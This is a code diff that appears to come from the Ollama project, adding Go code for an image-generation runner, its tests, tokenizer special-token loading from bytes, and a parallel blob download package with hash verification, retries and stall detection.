Content: raw.Content,
Done: raw.Done,
Step: raw.Step,
TotalSteps: raw.Total,
Image: raw.Image,
}
fn(cresp)
if cresp.Done {
return nil
}
}
return scanner.Err()
}
// Close terminates the subprocess.
func (s *Server) Close() error {
s.mu.Lock()
defer s.mu.Unlock()
if s.cmd != nil && s.cmd.Process != nil {
slog.Info("stopping image runner subprocess", "pid", s.cmd.Process.Pid)
s.cmd.Process.Signal(os.Interrupt)
// Wait briefly for graceful shutdown
select {
case <-s.done:
case <-time.After(5 * time.Second):
s.cmd.Process.Kill()
}
s.cmd = nil
}
return nil
}
// VRAMSize returns the estimated VRAM usage.
func (s *Server) VRAMSize() uint64 {
return s.vramSize
}
// TotalSize returns the total memory usage.
func (s *Server) TotalSize() uint64 {
return s.vramSize
}
// VRAMByGPU returns VRAM usage for a specific GPU.
func (s *Server) VRAMByGPU(id ml.DeviceID) uint64 {
return s.vramSize
}
func (s *Server) Embedding(ctx context.Context, input string) ([]float32, int, error) {
return nil, 0, errors.New("not supported")
}
func (s *Server) Tokenize(ctx context.Context, content string) ([]int, error) {
return nil, errors.New("not supported")
}
func (s *Server) Detokenize(ctx context.Context, tokens []int) (string, error) {
return "", errors.New("not supported")
}
func (s *Server) Pid() int {
s.mu.Lock()
defer s.mu.Unlock()
if s.cmd != nil && s.cmd.Process != nil {
return s.cmd.Process.Pid
}
return -1
}
func (s *Server) GetPort() int { return s.port }
func (s *Server) GetDeviceInfos(ctx context.Context) []ml.DeviceInfo { return nil }
func (s *Server) HasExited() bool {
select {
case <-s.done:
return true
default:
return false
}
}
// Ensure Server implements llm.LlamaServer
var _ llm.LlamaServer = (*Server)(nil)

82
x/imagegen/server_test.go Normal file
View File

@@ -0,0 +1,82 @@
package imagegen
import (
"runtime"
"testing"
)
// TestPlatformSupport verifies platform validation works correctly.
func TestPlatformSupport(t *testing.T) {
err := CheckPlatformSupport()
switch runtime.GOOS {
case "darwin":
if runtime.GOARCH == "arm64" {
// Apple Silicon should be supported
if err != nil {
t.Errorf("Expected nil error on darwin/arm64, got: %v", err)
}
} else {
// Intel Mac should fail
if err == nil {
t.Error("Expected error on darwin/amd64 (Intel), got nil")
}
if err != nil && err.Error() == "" {
t.Error("Expected meaningful error message for unsupported platform")
}
}
case "linux", "windows":
// Linux/Windows are allowed (CUDA support checked at runtime)
if err != nil {
t.Errorf("Expected nil error on %s, got: %v", runtime.GOOS, err)
}
default:
// Other platforms should fail
if err == nil {
t.Errorf("Expected error on unsupported platform %s, got nil", runtime.GOOS)
}
}
}
// TestMemoryRequirementsError verifies memory check returns clear error.
func TestMemoryRequirementsError(t *testing.T) {
// Test with insufficient memory
err := CheckMemoryRequirements("test-model", 8*GB)
if err == nil {
t.Error("Expected error for insufficient memory (8GB < 21GB default)")
}
// Test with sufficient memory
err = CheckMemoryRequirements("test-model", 32*GB)
if err != nil {
t.Errorf("Expected no error for sufficient memory (32GB), got: %v", err)
}
}
// TestEstimateVRAMReturnsReasonableDefaults verifies VRAM estimates are sensible.
func TestEstimateVRAMReturnsReasonableDefaults(t *testing.T) {
// Unknown model should return default (21GB)
vram := EstimateVRAM("unknown-model")
if vram < 10*GB || vram > 100*GB {
t.Errorf("VRAM estimate %d GB is outside reasonable range (10-100 GB)", vram/GB)
}
// Verify known pipeline estimates exist and are reasonable
for name, estimate := range modelVRAMEstimates {
if estimate < 10*GB {
t.Errorf("VRAM estimate for %s (%d GB) is suspiciously low", name, estimate/GB)
}
if estimate > 200*GB {
t.Errorf("VRAM estimate for %s (%d GB) is suspiciously high", name, estimate/GB)
}
}
}
// TestServerInterfaceCompliance verifies Server implements llm.LlamaServer.
// This is a compile-time check but we document it as a test.
func TestServerInterfaceCompliance(t *testing.T) {
// The var _ llm.LlamaServer = (*Server)(nil) line in server.go
// ensures compile-time interface compliance.
// This test documents that requirement.
t.Log("Server implements llm.LlamaServer interface (compile-time checked)")
}

View File

@@ -256,6 +256,164 @@ func rewritePatternForRE2(pattern string) string {
return pattern
}
// LoadFromBytes loads a tokenizer from tokenizer.json bytes.
// This is useful when loading from blob storage where the file content is already in memory.
// Note: This won't load special token config from companion files. Use LoadFromBytesWithConfig
// to provide tokenizer_config.json data for proper PAD/EOS token loading.
func LoadFromBytes(data []byte) (*Tokenizer, error) {
return loadFromTokenizerJSON(data, "")
}
// TokenizerConfig holds optional configuration data that can be passed to LoadFromBytesWithConfig.
type TokenizerConfig struct {
TokenizerConfigJSON []byte // tokenizer_config.json content
GenerationConfigJSON []byte // generation_config.json content
SpecialTokensMapJSON []byte // special_tokens_map.json content
ConfigJSON []byte // config.json content
}
// LoadFromBytesWithConfig loads a tokenizer from tokenizer.json bytes with additional config files.
// This is useful when loading from blob storage where companion config files are also blobs.
func LoadFromBytesWithConfig(data []byte, config *TokenizerConfig) (*Tokenizer, error) {
t, err := loadFromTokenizerJSON(data, "")
if err != nil {
return nil, err
}
if config == nil {
return t, nil
}
// Apply special token configs from provided data
loadSpecialTokenConfigFromBytes(t, config)
return t, nil
}
// loadSpecialTokenConfigFromBytes loads special token configuration from byte slices.
func loadSpecialTokenConfigFromBytes(t *Tokenizer, config *TokenizerConfig) {
// Helper to parse eos_token_id which can be int or []int
parseTokenIDs := func(v interface{}) []int32 {
switch val := v.(type) {
case float64:
return []int32{int32(val)}
case []interface{}:
ids := make([]int32, 0, len(val))
for _, id := range val {
if f, ok := id.(float64); ok {
ids = append(ids, int32(f))
}
}
return ids
}
return nil
}
// Priority 1: generation_config.json
if len(config.GenerationConfigJSON) > 0 {
var genConfig struct {
EOSTokenID interface{} `json:"eos_token_id"`
BOSTokenID interface{} `json:"bos_token_id"`
}
if err := json.Unmarshal(config.GenerationConfigJSON, &genConfig); err == nil {
if ids := parseTokenIDs(genConfig.EOSTokenID); len(ids) > 0 {
t.vocab.EOS = ids
}
if ids := parseTokenIDs(genConfig.BOSTokenID); len(ids) > 0 {
t.vocab.BOS = ids[0]
}
}
}
// Priority 2: config.json
if len(config.ConfigJSON) > 0 && (len(t.vocab.EOS) == 0 || t.vocab.BOS < 0) {
var modelConfig struct {
EOSTokenID interface{} `json:"eos_token_id"`
BOSTokenID interface{} `json:"bos_token_id"`
}
if err := json.Unmarshal(config.ConfigJSON, &modelConfig); err == nil {
if len(t.vocab.EOS) == 0 {
if ids := parseTokenIDs(modelConfig.EOSTokenID); len(ids) > 0 {
t.vocab.EOS = ids
}
}
if t.vocab.BOS < 0 {
if ids := parseTokenIDs(modelConfig.BOSTokenID); len(ids) > 0 {
t.vocab.BOS = ids[0]
}
}
}
}
// Priority 3: tokenizer_config.json
if len(config.TokenizerConfigJSON) > 0 {
var tokConfig struct {
BOSToken interface{} `json:"bos_token"`
EOSToken interface{} `json:"eos_token"`
PADToken interface{} `json:"pad_token"`
AddBOSToken *bool `json:"add_bos_token"`
AddEOSToken *bool `json:"add_eos_token"`
}
if err := json.Unmarshal(config.TokenizerConfigJSON, &tokConfig); err == nil {
if t.vocab.BOS < 0 {
if bosStr := extractTokenString(tokConfig.BOSToken); bosStr != "" {
if id, ok := t.specialTokens[bosStr]; ok {
t.vocab.BOS = id
}
}
}
if len(t.vocab.EOS) == 0 {
if eosStr := extractTokenString(tokConfig.EOSToken); eosStr != "" {
if id, ok := t.specialTokens[eosStr]; ok {
t.vocab.EOS = []int32{id}
}
}
}
if t.vocab.PAD < 0 {
if padStr := extractTokenString(tokConfig.PADToken); padStr != "" {
if id, ok := t.specialTokens[padStr]; ok {
t.vocab.PAD = id
}
}
}
if tokConfig.AddBOSToken != nil {
t.vocab.AddBOS = *tokConfig.AddBOSToken
}
if tokConfig.AddEOSToken != nil {
t.vocab.AddEOS = *tokConfig.AddEOSToken
}
}
}
// Priority 4: special_tokens_map.json
if len(config.SpecialTokensMapJSON) > 0 {
var tokensMap map[string]interface{}
if err := json.Unmarshal(config.SpecialTokensMapJSON, &tokensMap); err == nil {
if t.vocab.BOS < 0 {
if bosStr := extractTokenString(tokensMap["bos_token"]); bosStr != "" {
if id, ok := t.specialTokens[bosStr]; ok {
t.vocab.BOS = id
}
}
}
if len(t.vocab.EOS) == 0 {
if eosStr := extractTokenString(tokensMap["eos_token"]); eosStr != "" {
if id, ok := t.specialTokens[eosStr]; ok {
t.vocab.EOS = []int32{id}
}
}
}
if t.vocab.PAD < 0 {
if padStr := extractTokenString(tokensMap["pad_token"]); padStr != "" {
if id, ok := t.specialTokens[padStr]; ok {
t.vocab.PAD = id
}
}
}
}
}
}
// Load loads a tokenizer from a path which can be:
// - A tokenizer.json file
// - A directory containing tokenizer.json or vocab.json + merges.txt

View File

@@ -0,0 +1,329 @@
package transfer
import (
"cmp"
"context"
"crypto/sha256"
"errors"
"fmt"
"io"
"log/slog"
"net/http"
"net/url"
"os"
"path/filepath"
"slices"
"sync"
"sync/atomic"
"time"
"golang.org/x/sync/errgroup"
"golang.org/x/sync/semaphore"
)
var (
errStalled = errors.New("download stalled")
errSlow = errors.New("download too slow")
)
type downloader struct {
client *http.Client
baseURL string
destDir string
repository string // Repository path for blob URLs (e.g., "library/model")
token *string
getToken func(context.Context, AuthChallenge) (string, error)
userAgent string
stallTimeout time.Duration
progress *progressTracker
speeds *speedTracker
logger *slog.Logger
}
func download(ctx context.Context, opts DownloadOptions) error {
if len(opts.Blobs) == 0 {
return nil
}
// Calculate total from all blobs (for accurate progress reporting on resume)
var total int64
for _, b := range opts.Blobs {
total += b.Size
}
// Filter out already-downloaded blobs and track completed bytes
var blobs []Blob
var alreadyCompleted int64
for _, b := range opts.Blobs {
if fi, _ := os.Stat(filepath.Join(opts.DestDir, digestToPath(b.Digest))); fi != nil && fi.Size() == b.Size {
if opts.Logger != nil {
opts.Logger.Debug("blob already exists", "digest", b.Digest, "size", b.Size)
}
alreadyCompleted += b.Size
continue
}
blobs = append(blobs, b)
}
if len(blobs) == 0 {
return nil
}
token := opts.Token
progress := newProgressTracker(total, opts.Progress)
progress.add(alreadyCompleted) // Report already-downloaded bytes upfront
d := &downloader{
client: cmp.Or(opts.Client, defaultClient),
baseURL: opts.BaseURL,
destDir: opts.DestDir,
repository: cmp.Or(opts.Repository, "library/_"),
token: &token,
getToken: opts.GetToken,
userAgent: cmp.Or(opts.UserAgent, defaultUserAgent),
stallTimeout: cmp.Or(opts.StallTimeout, defaultStallTimeout),
progress: progress,
speeds: &speedTracker{},
logger: opts.Logger,
}
concurrency := cmp.Or(opts.Concurrency, DefaultDownloadConcurrency)
sem := semaphore.NewWeighted(int64(concurrency))
g, ctx := errgroup.WithContext(ctx)
for _, blob := range blobs {
g.Go(func() error {
if err := sem.Acquire(ctx, 1); err != nil {
return err
}
defer sem.Release(1)
return d.download(ctx, blob)
})
}
return g.Wait()
}
func (d *downloader) download(ctx context.Context, blob Blob) error {
var lastErr error
var slowRetries int
attempt := 0
for attempt < maxRetries {
if attempt > 0 {
if err := backoff(ctx, attempt, time.Second<<uint(attempt-1)); err != nil {
return err
}
}
start := time.Now()
n, err := d.downloadOnce(ctx, blob)
if err == nil {
if s := time.Since(start).Seconds(); s > 0 {
d.speeds.record(float64(blob.Size) / s)
}
return nil
}
d.progress.add(-n) // rollback
switch {
case errors.Is(err, context.Canceled), errors.Is(err, context.DeadlineExceeded):
return err
case errors.Is(err, errStalled):
// Don't count stall retries against limit
case errors.Is(err, errSlow):
if slowRetries++; slowRetries >= 3 {
attempt++ // Only count after 3 slow retries
}
default:
attempt++
}
lastErr = err
}
return fmt.Errorf("%w: %v", errMaxRetriesExceeded, lastErr)
}
func (d *downloader) downloadOnce(ctx context.Context, blob Blob) (int64, error) {
if d.logger != nil {
d.logger.Debug("downloading blob", "digest", blob.Digest, "size", blob.Size)
}
baseURL, _ := url.Parse(d.baseURL)
u, err := d.resolve(ctx, fmt.Sprintf("%s/v2/%s/blobs/%s", d.baseURL, d.repository, blob.Digest))
if err != nil {
return 0, err
}
req, _ := http.NewRequestWithContext(ctx, http.MethodGet, u.String(), nil)
req.Header.Set("User-Agent", d.userAgent)
// Add auth only for same-host (not CDN)
if u.Host == baseURL.Host && *d.token != "" {
req.Header.Set("Authorization", "Bearer "+*d.token)
}
resp, err := d.client.Do(req)
if err != nil {
return 0, err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return 0, fmt.Errorf("status %d", resp.StatusCode)
}
return d.save(ctx, blob, resp.Body)
}
func (d *downloader) save(ctx context.Context, blob Blob, r io.Reader) (int64, error) {
dest := filepath.Join(d.destDir, digestToPath(blob.Digest))
tmp := dest + ".tmp"
os.MkdirAll(filepath.Dir(dest), 0o755)
f, err := os.Create(tmp)
if err != nil {
return 0, err
}
defer f.Close()
setSparse(f)
h := sha256.New()
n, err := d.copy(ctx, f, r, h)
if err != nil {
os.Remove(tmp)
return n, err
}
f.Close()
if got := fmt.Sprintf("sha256:%x", h.Sum(nil)); got != blob.Digest {
os.Remove(tmp)
return n, fmt.Errorf("digest mismatch")
}
if n != blob.Size {
os.Remove(tmp)
return n, fmt.Errorf("size mismatch")
}
return n, os.Rename(tmp, dest)
}
func (d *downloader) copy(ctx context.Context, dst io.Writer, src io.Reader, h io.Writer) (int64, error) {
var n int64
var lastRead atomic.Int64
lastRead.Store(time.Now().UnixNano())
start := time.Now()
ctx, cancel := context.WithCancelCause(ctx)
defer cancel(nil)
go func() {
tick := time.NewTicker(time.Second)
defer tick.Stop()
for {
select {
case <-ctx.Done():
return
case <-tick.C:
if time.Since(time.Unix(0, lastRead.Load())) > d.stallTimeout {
cancel(errStalled)
return
}
if e := time.Since(start); e > 5*time.Second {
if m := d.speeds.median(); m > 0 && float64(n)/e.Seconds() < m*0.1 {
cancel(errSlow)
return
}
}
}
}
}()
buf := make([]byte, 32*1024)
for {
if err := ctx.Err(); err != nil {
if c := context.Cause(ctx); c != nil {
return n, c
}
return n, err
}
nr, err := src.Read(buf)
if nr > 0 {
lastRead.Store(time.Now().UnixNano())
dst.Write(buf[:nr])
h.Write(buf[:nr])
d.progress.add(int64(nr))
n += int64(nr)
}
if err == io.EOF {
return n, nil
}
if err != nil {
return n, err
}
}
}
func (d *downloader) resolve(ctx context.Context, rawURL string) (*url.URL, error) {
u, _ := url.Parse(rawURL)
for range 10 {
req, _ := http.NewRequestWithContext(ctx, http.MethodGet, u.String(), nil)
req.Header.Set("User-Agent", d.userAgent)
if *d.token != "" {
req.Header.Set("Authorization", "Bearer "+*d.token)
}
resp, err := d.client.Do(req)
if err != nil {
return nil, err
}
resp.Body.Close()
switch resp.StatusCode {
case http.StatusOK:
return u, nil
case http.StatusUnauthorized:
if d.getToken == nil {
return nil, fmt.Errorf("unauthorized")
}
ch := parseAuthChallenge(resp.Header.Get("WWW-Authenticate"))
if *d.token, err = d.getToken(ctx, ch); err != nil {
return nil, err
}
case http.StatusTemporaryRedirect, http.StatusFound, http.StatusMovedPermanently:
loc, _ := resp.Location()
if loc.Host != u.Host {
return loc, nil
}
u = loc
default:
return nil, fmt.Errorf("status %d", resp.StatusCode)
}
}
return nil, fmt.Errorf("too many redirects")
}
type speedTracker struct {
mu sync.Mutex
speeds []float64
}
func (s *speedTracker) record(v float64) {
s.mu.Lock()
s.speeds = append(s.speeds, v)
if len(s.speeds) > 30 {
s.speeds = s.speeds[1:]
}
s.mu.Unlock()
}
func (s *speedTracker) median() float64 {
s.mu.Lock()
defer s.mu.Unlock()
if len(s.speeds) < 5 {
return 0
}
sorted := make([]float64, len(s.speeds))
copy(sorted, s.speeds)
slices.Sort(sorted)
return sorted[len(sorted)/2]
}
const defaultStallTimeout = 10 * time.Second

View File

@@ -0,0 +1,12 @@
//go:build !windows
package transfer
import "os"
// setSparse is a no-op on non-Windows platforms.
// On Windows, this sets the FSCTL_SET_SPARSE attribute which allows the OS
// to not allocate disk blocks for zero-filled regions. This is useful for
// partial downloads where not all data has been written yet. On Unix-like
// systems, filesystems typically handle this automatically (sparse by default).
func setSparse(_ *os.File) {}

View File

@@ -0,0 +1,31 @@
//go:build windows
package transfer
import (
"os"
"golang.org/x/sys/windows"
)
// setSparse sets the FSCTL_SET_SPARSE attribute on Windows files.
// This allows the OS to not allocate disk blocks for zero-filled regions,
// which is useful for large files that may not be fully written (e.g., partial
// downloads). Without this, Windows may pre-allocate disk space for the full
// file size even if most of it is zeros.
//
// Note: Errors are intentionally ignored because:
// 1. The file will still work correctly without sparse support
// 2. Not all Windows filesystems support sparse files (e.g., FAT32)
// 3. This is an optimization, not a requirement
func setSparse(file *os.File) {
var bytesReturned uint32
_ = windows.DeviceIoControl(
windows.Handle(file.Fd()),
windows.FSCTL_SET_SPARSE,
nil, 0,
nil, 0,
&bytesReturned,
nil,
)
}

View File

@@ -0,0 +1,216 @@
// Package transfer provides minimal, fast blob transfer for tensor-based models.
//
// This package is in x/ because the tensor model storage format is under development.
// It provides optimized transfer for models with many small blobs (tensor models)
// rather than few large blobs (typical LLMs).
//
// TODO (jmorganca): Integrate into server/download.go and server/upload.go when stable.
//
// Design Philosophy:
// This package is intentionally simpler than the main server's download/upload code.
// Key simplifications for many-small-blob workloads:
//
// - Whole-blob transfers: No part-based chunking. Each blob downloads/uploads as one unit.
// - No resume: If a transfer fails, it restarts from scratch (fine for small blobs).
// - Inline hashing: SHA256 computed during streaming, not asynchronously after parts complete.
// - Stall and speed detection: Cancels on no data (stall) or speed below 10% of median.
//
// For large models (multi-GB), use the server's download/upload code which has:
// - Part-based transfers with 64MB chunks
// - Resumable downloads with JSON state files
// - Async streamHasher that hashes from OS page cache as parts complete
// - Speed tracking with rolling median to detect and restart slow parts
package transfer
import (
"context"
"errors"
"log/slog"
"math/rand/v2"
"net/http"
"strings"
"sync/atomic"
"time"
)
// Blob represents a content-addressed blob to transfer.
type Blob struct {
Digest string // sha256:...
Size int64
// From enables cross-repository blob mounting (upload only).
// When set, the upload will first attempt to mount the blob from this source
// repository instead of uploading the data. This is a Docker Registry v2 API
// feature that avoids re-uploading blobs that already exist elsewhere.
//
// Example: From="library/source-model" will add ?mount=<digest>&from=library/source-model
// to the POST /blobs/uploads/ request. If the registry returns 201 Created,
// the blob was mounted successfully and no upload is needed.
//
// See: https://distribution.github.io/distribution/spec/api/#cross-repository-blob-mount
From string
}
// DownloadOptions configures a parallel download operation.
type DownloadOptions struct {
Blobs []Blob // Blobs to download
BaseURL string // Registry base URL
DestDir string // Destination directory for blobs
Repository string // Repository path for blob URLs (e.g., "library/model")
Concurrency int // Max parallel downloads (default 64)
Progress func(completed, total int64) // Progress callback (optional)
Client *http.Client // HTTP client (optional, uses default)
Token string // Auth token (optional)
GetToken func(ctx context.Context, challenge AuthChallenge) (string, error) // Token refresh callback
Logger *slog.Logger // Optional structured logger
UserAgent string // User-Agent header (optional, has default)
StallTimeout time.Duration // Timeout for stall detection (default 10s)
}
// UploadOptions configures a parallel upload operation.
type UploadOptions struct {
Blobs []Blob // Blobs to upload
BaseURL string // Registry base URL
SrcDir string // Source directory containing blobs
Concurrency int // Max parallel uploads (default 32)
Progress func(completed, total int64) // Progress callback (optional)
Client *http.Client // HTTP client (optional, uses default)
Token string // Auth token (optional)
GetToken func(ctx context.Context, challenge AuthChallenge) (string, error) // Token refresh callback
Logger *slog.Logger // Optional structured logger
UserAgent string // User-Agent header (optional, has default)
// Manifest fields (optional) - if set, manifest is pushed after all blobs complete
Manifest []byte // Raw manifest JSON to push
ManifestRef string // Tag or digest for the manifest (e.g., "latest", "sha256:...")
Repository string // Repository path for manifest URL (e.g., "library/model")
}
// AuthChallenge represents a parsed WWW-Authenticate challenge.
type AuthChallenge struct {
Realm string
Service string
Scope string
}
// Default concurrency limits and settings
const (
DefaultDownloadConcurrency = 64
DefaultUploadConcurrency = 32
maxRetries = 6
defaultUserAgent = "ollama-transfer/1.0"
)
var errMaxRetriesExceeded = errors.New("max retries exceeded")
// defaultClient is a shared HTTP client with connection pooling.
var defaultClient = &http.Client{
Transport: &http.Transport{
MaxIdleConns: 100,
MaxIdleConnsPerHost: 100,
IdleConnTimeout: 90 * time.Second,
},
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
// progressTracker aggregates progress across concurrent operations.
type progressTracker struct {
completed atomic.Int64
total int64
callback func(completed, total int64)
}
func newProgressTracker(total int64, callback func(completed, total int64)) *progressTracker {
return &progressTracker{
total: total,
callback: callback,
}
}
func (p *progressTracker) add(n int64) {
if p == nil || p.callback == nil {
return
}
completed := p.completed.Add(n)
p.callback(completed, p.total)
}
// Download downloads blobs in parallel with streaming hash verification.
func Download(ctx context.Context, opts DownloadOptions) error {
return download(ctx, opts)
}
// Upload uploads blobs in parallel.
func Upload(ctx context.Context, opts UploadOptions) error {
return upload(ctx, opts)
}
// digestToPath converts sha256:abc123 to sha256-abc123
func digestToPath(digest string) string {
if len(digest) > 7 && digest[6] == ':' {
return digest[:6] + "-" + digest[7:]
}
return digest
}
// parseAuthChallenge parses a WWW-Authenticate header value.
// Example: Bearer realm="https://auth.example.com",service="registry",scope="repository:foo:pull"
func parseAuthChallenge(header string) AuthChallenge {
header = strings.TrimPrefix(header, "Bearer ")
getValue := func(key string) string {
startIdx := strings.Index(header, key+"=")
if startIdx == -1 {
return ""
}
startIdx += len(key) + 1
if startIdx >= len(header) {
return ""
}
// Handle quoted values
if header[startIdx] == '"' {
startIdx++
endIdx := strings.Index(header[startIdx:], "\"")
if endIdx == -1 {
return header[startIdx:]
}
return header[startIdx : startIdx+endIdx]
}
// Unquoted value - ends at comma or end of string
endIdx := strings.Index(header[startIdx:], ",")
if endIdx == -1 {
return header[startIdx:]
}
return header[startIdx : startIdx+endIdx]
}
return AuthChallenge{
Realm: getValue("realm"),
Service: getValue("service"),
Scope: getValue("scope"),
}
}
// backoff returns a function that sleeps with exponential backoff.
func backoff(ctx context.Context, attempt int, maxBackoff time.Duration) error {
if ctx.Err() != nil {
return ctx.Err()
}
// n^2 backoff with jitter
d := min(time.Duration(attempt*attempt)*10*time.Millisecond, maxBackoff)
d = time.Duration(float64(d) * (rand.Float64() + 0.5))
t := time.NewTimer(d)
defer t.Stop()
select {
case <-ctx.Done():
return ctx.Err()
case <-t.C:
return nil
}
}

View File

File diff suppressed because it is too large Load Diff

Some files were not shown because too many files have changed in this diff Show More